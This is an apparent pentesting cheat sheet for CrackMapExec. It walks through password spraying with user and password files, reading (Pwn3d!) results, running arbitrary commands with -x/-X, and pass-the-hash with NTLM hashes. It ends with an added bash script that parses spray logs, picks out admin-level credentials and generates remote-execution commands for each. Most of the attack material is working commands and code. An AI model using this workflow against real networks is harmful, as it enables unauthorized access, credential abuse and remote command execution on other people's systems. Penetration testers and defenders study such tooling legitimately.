CrackMapExec: “A swiss army knife for pentesting networks…”
Supported Protocols: WinRM, MSSQL, SMB, SSH
For help and syntax, just issue the command: crackmapexec
or…
crackmapexec -h
crackmapexec winrm -h   # help specific to the winrm protocol
crackmapexec smb -h     # help specific to the smb protocol
General Syntax:
crackmapexec <protocol> <target(s)> -u username -p password
Examples:
crackmapexec <protocol> <target(s)> -u username -p 'Admin!123@'
# or...
crackmapexec <protocol> <target(s)> -u='username' -p='Admin!123@'
Single-quote any password that contains shell metacharacters such as !, $ or spaces, or the shell will mangle it before crackmapexec sees it.
Syntax:
crackmapexec winrm [target ip] -u administrator -p /usr/share/.../unix_passwords.txt
Both -u and -p accept either a single value or a file: give -u a file of candidate user names and -p a file of candidate passwords to try. Every user is tried against every password, so check the domain's account lockout policy before spraying; --no-bruteforce instead pairs each user with the password on the same line of the password file. By default crackmapexec stops at the first credential that works on a target; add --continue-on-success to keep testing the rest.
Look over the output from the top down: [+] marks a login that worked, [-] one that failed, and (Pwn3d!) after a working login means the credential gives you command execution on that host.
Execute Commands: If you found working credentials, you can use crackmapexec to execute arbitrary Windows commands on the target machine. -x runs the command through cmd.exe; -X runs it through PowerShell. Syntax:
crackmapexec winrm [target ip] -u administrator -p [password] -x "whoami"
crackmapexec winrm [target ip] -u administrator -p [password] -x "systeminfo"
You should get some happy feedback along with the results of your command execution.
systeminfo (Windows) takes a while to run but provides a lot of information about your target system.
Pass-the-hash: if you have the administrator's NTLM hash rather than the password (for example from a dumped SAM), give it with -H instead of -p. Either the NT hash alone or the LM:NT pair is accepted:
crackmapexec smb [target ip] -u Administrator -H "[administrator ntlm hash; copy-paste]"
This should indicate whether or not the hash works. Over SMB, command execution needs admin rights on the host, so look for (Pwn3d!) before trying -x.
crackmapexec smb [target ip] -u Administrator -H "[administrator ntlm hash; copy-paste]" -x "ipconfig"
It should give you visual feedback about the command execution. And there you go. Execute what you want.
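After a spray against a range you end up with a long crackmapexec log and need to pick out the credentials that worked and feed them back into the -x step above. The script below is an added example, not part of crackmapexec or of the original page: it parses saved crackmapexec output (a constructed sample is embedded; the hosts, names and secrets are made up), lists the successful logins, flags the ones marked (Pwn3d!), and builds the follow-up crackmapexec command for each, sending an NTLM hash to -H and anything else to -p. The function names parse_cme_successes, admin_cme_successes and cme_exec_cmd are mine.

```bash
#!/usr/bin/env bash
# Added example: triage crackmapexec output and build follow-up -x commands.
# Not part of crackmapexec; it only reads the tool's normal text output.
# Real usage:
#   crackmapexec smb 10.10.10.0/24 -u users.txt -p pass.txt --continue-on-success | tee cme.log
#   parse_cme_successes < cme.log

# Constructed sample in crackmapexec's output format (hosts, accounts and
# secrets are invented for this example).
SAMPLE_CME_LOG='SMB         10.10.10.5      445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.10.10.5      445    DC01             [+] corp.local\administrator:Password123! (Pwn3d!)
SMB         10.10.10.6      445    WS01             [-] corp.local\bob:Password123! STATUS_LOGON_FAILURE
SMB         10.10.10.6      445    WS01             [+] corp.local\bob:Winter2023
WINRM       10.10.10.7      5985   WS02             [+] corp.local\alice:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c (Pwn3d!)'

parse_cme_successes() {
    # Reads crackmapexec output on stdin and prints one line per working login:
    #   PROTOCOL HOST DOMAIN\USER:SECRET yes|no
    # The last field is "yes" when crackmapexec appended "(Pwn3d!)", i.e. the
    # credential gives command execution on that host.
    awk '$5 == "[+]" {
        admin = ($0 ~ /\(Pwn3d!\)/) ? "yes" : "no"
        print $1, $2, $6, admin
    }'
}

count_cme_successes() {
    parse_cme_successes | wc -l | tr -d ' '
}

admin_cme_successes() {
    # Only the logins worth handing to -x: PROTOCOL HOST DOMAIN\USER:SECRET
    parse_cme_successes | awk '$4 == "yes" { print $1, $2, $3 }'
}

cme_exec_cmd() {
    # $1 protocol as crackmapexec prints it, $2 host,
    # $3 DOMAIN\USER:SECRET as printed by parse_cme_successes, $4 command to run.
    # Prints the crackmapexec invocation that runs $4 with that credential.
    local proto host cred cmd account secret domain user auth dflag
    proto=$(printf '%s' "$1" | tr 'A-Z' 'a-z')
    host=$2; cred=$3; cmd=$4
    account=${cred%%:*}      # usernames cannot contain ':', so split on the first one
    secret=${cred#*:}
    case $account in
        *\\*) domain=${account%%\\*}; user=${account#*\\} ;;
        *)    domain=""; user=$account ;;
    esac
    # An NT hash alone or an LM:NT pair (32 hex chars each) goes to -H; anything
    # else is treated as a password. A 32-character all-hex password would be
    # misclassified; that is the one ambiguity crackmapexec's output leaves.
    if printf '%s' "$secret" | grep -Eqi '^([0-9a-f]{32}:)?[0-9a-f]{32}$'; then
        auth="-H '$secret'"
    else
        auth="-p '$secret'"
    fi
    dflag=""
    [ -n "$domain" ] && dflag="-d $domain "
    printf "crackmapexec %s %s %s-u %s %s -x '%s'\n" "$proto" "$host" "$dflag" "$user" "$auth" "$cmd"
}

# Stand-alone run over the constructed sample.
printf '%s\n' "$SAMPLE_CME_LOG" | parse_cme_successes
printf '%s\n' "$SAMPLE_CME_LOG" | admin_cme_successes | while read -r proto host cred; do
    cme_exec_cmd "$proto" "$host" "$cred" whoami
done
```

The bob credential is listed but not turned into a command: it authenticated but has no (Pwn3d!), so -x over SMB would fail for it. The generated command single-quotes the secret for the same reason the examples above do.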